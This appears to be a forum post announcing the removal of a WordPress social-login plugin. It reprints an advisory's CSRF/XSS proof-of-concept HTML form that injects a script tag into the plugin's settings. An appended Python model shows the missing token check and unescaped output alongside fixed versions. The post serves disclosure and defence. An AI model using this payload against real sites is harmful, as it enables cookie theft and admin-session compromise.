CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login

Support @QUE.COM (Keymaster), August 29, 2019 at 12:01 pm, #27361

I removed the WordPress Social Login from our website due to a vulnerability.

Proof of Concept

The following proof of concept will cause an alert box with any available cookies to be shown when visiting the plugin’s admin page, /wp-admin/admin.php?page=mo_openid_settings. Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=mo_openid_settings" method="POST">
<input type="hidden" name="option" value="mo_openid_enable_apps" />
<input type="hidden" name="mo_openid_login_widget_customize_text" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Read this article: https://www.pluginvulnerabilities.com/2019/04/01/csrf-cross-site-scripting-xss-vulnerability-in-social-login-social-sharing-by-miniorange-wordpress-social-login-facebook-google-twitter/

You can still log in to our website using your existing account, retrieve a new password and it will be sent to your email address on file.

Be safe in the wild wild Internet.
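
A minimal Python model of the two flaws the proof of concept above combines, added here as an example (it is not code from the post or from the plugin, which is written in PHP): a settings POST accepted without a per-session token, and a stored value echoed into an HTML attribute without escaping. The function names, the secret and the session id are assumptions made for the example; the field name and the payload string are the ones shown in the post.

```python
import hashlib
import hmac
import html
from html.parser import HTMLParser

SECRET = b"constructed-server-secret"  # constructed value, assumption for the example
FIELD = "mo_openid_login_widget_customize_text"  # field name from the post
POC_VALUE = '"><script>alert(document.cookie);</script>'  # payload from the post


def csrf_token(session_id: str) -> str:
    """Per-session token the genuine settings form would carry as a hidden field."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def save_setting(store: dict, session_id: str, post: dict) -> bool:
    """Hardened save handler: refuse any POST that lacks the session's token."""
    supplied = str(post.get("csrf_token", "")).encode()
    if not hmac.compare_digest(supplied, csrf_token(session_id).encode()):
        return False  # a form hosted on another site cannot know the token
    store[FIELD] = post.get(FIELD, "")
    return True


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: the stored value is echoed into the attribute as-is."""
    return f'<input type="text" name="{FIELD}" value="{value}" />'


def render_safe(value: str) -> str:
    """Hardened pattern: quotes and angle brackets are escaped on output."""
    return f'<input type="text" name="{FIELD}" value="{html.escape(value, quote=True)}" />'


class TagCollector(HTMLParser):
    """Records every element a parser would create from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags
```

Either control alone leaves a gap: the token check stops the cross-site submission, and the output escaping keeps a value that does get stored from closing the attribute and starting a new element.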